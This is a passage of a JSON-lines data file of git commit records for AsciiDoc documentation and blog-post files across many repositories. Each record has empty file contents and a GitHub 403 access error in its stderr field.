2015-10-06-OCRWC-and-beyond.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-10-06-OCRWC-and-beyond.adoc","new_file":"_posts\/2015-10-06-OCRWC-and-beyond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d668293f1d85f453cffe52939259c6db3df7e3d","subject":"Update 2017-10-05-First-Blog-Entry.adoc","message":"Update 2017-10-05-First-Blog-Entry.adoc","repos":"shutas\/shutas.github.io,shutas\/shutas.github.io,shutas\/shutas.github.io,shutas\/shutas.github.io","old_file":"_posts\/2017-10-05-First-Blog-Entry.adoc","new_file":"_posts\/2017-10-05-First-Blog-Entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shutas\/shutas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4494a1dea43d0f5201f5e88abd3a1c30001bbbbf","subject":"Rm Web descriptor stuff","message":"Rm Web descriptor stuff\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Maven\/Best practices.adoc","new_file":"Maven\/Best practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2ee21cb51c309950f0bbf2393c7361d00dd45b3","subject":"Update 2015-03-15-Update-Whats-new-in-Version-020.adoc","message":"Update 
2015-03-15-Update-Whats-new-in-Version-020.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-03-15-Update-Whats-new-in-Version-020.adoc","new_file":"_posts\/2015-03-15-Update-Whats-new-in-Version-020.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6359801e039016074837af6a4653cf4ffdb9e6b1","subject":"Update 2015-03-22-Welcome-and-Hello.adoc","message":"Update 2015-03-22-Welcome-and-Hello.adoc","repos":"mdinaustin\/mdinaustin.github.io,mdinaustin\/mdinaustin.github.io,mdinaustin\/mdinaustin.github.io","old_file":"_posts\/2015-03-22-Welcome-and-Hello.adoc","new_file":"_posts\/2015-03-22-Welcome-and-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdinaustin\/mdinaustin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2afbd4e0b467b42e347e125a1da5306ee20654","subject":"Update 2015-11-18-New-in-the-family.adoc","message":"Update 2015-11-18-New-in-the-family.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-18-New-in-the-family.adoc","new_file":"_posts\/2015-11-18-New-in-the-family.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"575335cc5a772eff350e0ce1e14cb49fd81a05ee","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5babf6b9b83a5bfc74afd33ddbeb232644344692","subject":"Update 2015-04-17-React.adoc","message":"Update 2015-04-17-React.adoc","repos":"hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io","old_file":"_posts\/2015-04-17-React.adoc","new_file":"_posts\/2015-04-17-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hatohato25\/hatohato25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269df510c87d7c318a474bd8c1e8037a1f05785b","subject":"Update 2015-08-08-Hello.adoc","message":"Update 2015-08-08-Hello.adoc","repos":"imukulsharma\/imukulsharma.github.io,imukulsharma\/imukulsharma.github.io,imukulsharma\/imukulsharma.github.io","old_file":"_posts\/2015-08-08-Hello.adoc","new_file":"_posts\/2015-08-08-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imukulsharma\/imukulsharma.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"eda5517865f9c975c8c2882b52b8aa7738dc5799","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0e0ca3c317716f80700f68d988c2361560528e","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7934776b5306542b231d9c18e69f631a40cb7b1d","subject":"Link 2","message":"Link 2\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"952d6911156449e950ff58671a259cc5a662e16e","subject":"Facets README","message":"Facets README\n","repos":"oscerd\/core,D9110\/core,D9110\/core,forge\/core,ivannov\/core,ivannov\/core,pplatek\/core,ivannov\/core,agoncal\/core,ivannov\/core,oscerd\/core,jerr\/jbossforge-core,oscerd\/core,pplatek\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,oscerd\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,agoncal\/core,oscerd\/core,pplatek\/core,forge\/core,agoncal\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,jerr\/jbossforge-core,ivannov\/core,pplatek\/core,pplatek\/core,ivannov\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,pplatek\/core,forge\/core,oscerd\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,stalep\/forge-core,D9110\/core,forge\/core,oscerd\/core,oscerd\/core,agoncal\/core,D9110\/core,agoncal\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core,agoncal\/core,D9110\/core,forge\/core,D9110\/core,stalep\/forge-core,ivannov\/core,D9110\/core,D9110\/core,forge\/core","old_file":"facets\/README.asciidoc","new_file":"facets\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a2fd1b9f6dbd289d20cc151432f30f741b3b20f5","subject":"No more using 'hybrid mmapfs \/ niofs' (#25944)","message":"No more using 'hybrid mmapfs \/ niofs' (#25944)\n\nIt looks a bit ambiguous here.\r\n\r\nElasticSearch no more using 'hybrid mmapfs \/ niofs' which chooses filesystem based on the file. 
It is any one of the mmapfs, niofs or simplefs depending on the operating system.\r\nAs quoted here https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/5.5\/index-modules-store.html\r\n\r\nThanks,\r\nPulkit Agrawal","repos":"GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elas
ticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch","old_file":"docs\/reference\/setup\/sysconfig\/virtual-memory.asciidoc","new_file":"docs\/reference\/setup\/sysconfig\/virtual-memory.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99645f901b89ac817dee7b2e44c7a544ddbcfb3f","subject":"Adds readme to stdlib\/templates","message":"Adds readme to stdlib\/templates\n","repos":"gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml,gerdstolpmann\/ocaml","old_file":"stdlib\/templates\/README.adoc","new_file":"stdlib\/templates\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdstolpmann\/ocaml.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0495a7014909bca900dbc922c125323f4b073336","subject":"Update 2017-07-31-Clips.adoc","message":"Update 2017-07-31-Clips.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-07-31-Clips.adoc","new_file":"_posts\/2017-07-31-Clips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"033caab1792e48c159ec6bf2e7c123cd3bfa12b4","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec85eec3ff3ecc93e50db1ca7125d87449fc396","subject":"Document the need to re-download the repository list file to upgrade on Ubuntu","message":"Document the need to re-download the repository list file to upgrade on Ubuntu\n\nChange-Id: If342b3c820d1acb16e45ab3e9155565559b51075\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2530\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo 
<866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"551271278f3349fda2e25db9fbf9a2a0b8c95a2c","subject":"Update 2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","message":"Update 2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","new_file":"_posts\/2015-09-18-On-the-road-to-better-Javascript-with-Setters-and-Getters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e43fc0ed819e14f333ce566e34bcabb5642d0b6a","subject":"FORGE-2244: Created README for scaffold addon","message":"FORGE-2244: Created README for scaffold addon","repos":"forge\/core,agoncal\/core,forge\/core,pplatek\/core,agoncal\/core,D9110\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,forge\/core,pplatek\/core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,agoncal\/core,oscerd\/core,ivannov\/core,agoncal\/core,forge\/core,jerr\/jbossforge-core,ivannov\/core,jerr\/jbossforge-core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,ivannov\/core,oscerd\/core,pplatek\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,D9110\/core,oscerd\/core,oscerd\/core,D9110\/core,oscerd\/core,agoncal\/core,forge\/core,pplatek\/core,pplatek\/core,oscerd\/core,D9110\/core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,ivannov\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,agoncal\/core,ivannov\/core,forge\/core,forge\/core,D9110\/core,oscerd\/core,oscerd\/core,agoncal\/core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,pplatek\/core,agoncal\/core,forge\/core,ivannov\/core,oscerd\/core","old_file":"scaffold\/README.asciidoc","new_file":"scaffold\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a78545f8327d437e76d6f81003078b9ca8c39492","subject":"Updated version and release date on doc index","message":"Updated version and release date on doc 
index\n","repos":"Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"342412a3d074c0fecfc52db2b8d6bfa0a7b67902","subject":"revised and added initial info on filters","message":"revised and added initial info on filters\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad56d3dbf24b8cdac630b3aaa171b0e162c2c47e","subject":"Renamed batch_runtime_lifecycle","message":"Renamed batch_runtime_lifecycle\n","repos":"sidgoyal\/standards.jsr352.tck,WASdev\/standards.jsr352.tck,doctorbatch\/standards.jsr352.tck,doctorbatch\/standards.jsr352.tck,goldenryan\/standards.jsr352.tck","old_file":"specification\/job_runtime_lifecycle.adoc","new_file":"specification\/job_runtime_lifecycle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldenryan\/standards.jsr352.tck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b71b6804f3ac43d2210b66e549b120c5e076fe0","subject":"2016-10-28-Anfang.adoc","message":"2016-10-28-Anfang.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-10-28-Anfang.adoc","new_file":"_posts\/2016-10-28-Anfang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a38f6170abe3ca138636b4a04964f5bf3aae1a12","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8670dd95676c098510edc79760d5a9aedbe68d08","subject":"Update 2018-07-30-P-H-P.adoc","message":"Update 2018-07-30-P-H-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-P-H-P.adoc","new_file":"_posts\/2018-07-30-P-H-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510e3118412fb69e23d5818f6509ad7beca3aa2d","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a3224dc0b619aff620740632ad1d82cca410958","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3042b0911fbc52e75dfcf58754c98ca40974e5","subject":"Update 2017-01-21-Word-Histogram.adoc","message":"Update 2017-01-21-Word-Histogram.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Word-Histogram.adoc","new_file":"_posts\/2017-01-21-Word-Histogram.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f88677165bd651d8edbcbaec9e45bdfc40cf3d","subject":"add announcement post","message":"add announcement post\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2018\/01\/05\/git-deps.adoc","new_file":"content\/news\/2018\/01\/05\/git-deps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bbb73ec4b66892a14d4c68cda2ee6f2826132a9d","subject":"Fix complementary libraries list.","message":"Fix complementary libraries list.\n","repos":"yurrriq\/cats,OlegTheCat\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5db7306b506acd81f5e864dabf541709e361f40b","subject":"Update 2016-01-13-Comparison-of-methods-for-preparing-test-data-for-your-tests.adoc","message":"Update 2016-01-13-Comparison-of-methods-for-preparing-test-data-for-your-tests.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-13-Comparison-of-methods-for-preparing-test-data-for-your-tests.adoc","new_file":"_posts\/2016-01-13-Comparison-of-methods-for-preparing-test-data-for-your-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7e754d6ded5278851967c08424274979f89be90","subject":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","message":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"971cac6cb192215cd9e1030ea866b78b6b6ec94a","subject":"Added Macros file","message":"Added Macros file\n","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"guides\/docs\/misc\/macros.adoc","new_file":"guides\/docs\/misc\/macros.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eee9999443779f471dd62da360c13cd564403d0","subject":"First draft of orderability CIP","message":"First draft of orderability CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7b7f4df02f28bfe602d3a195650d39635da1243","subject":"SOLR-10651: Statistical function docs for 7.0 Part 3","message":"SOLR-10651: Statistical function docs for 7.0 Part 3\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/statistical-programming.adoc","new_file":"solr\/solr-ref-guide\/src\/statistical-programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"693e137dc821d7677525d05f4f18fe6fc266c417","subject":"Update 2017-02-01-Visualisation-of-January-Transfer-Window.adoc","message":"Update 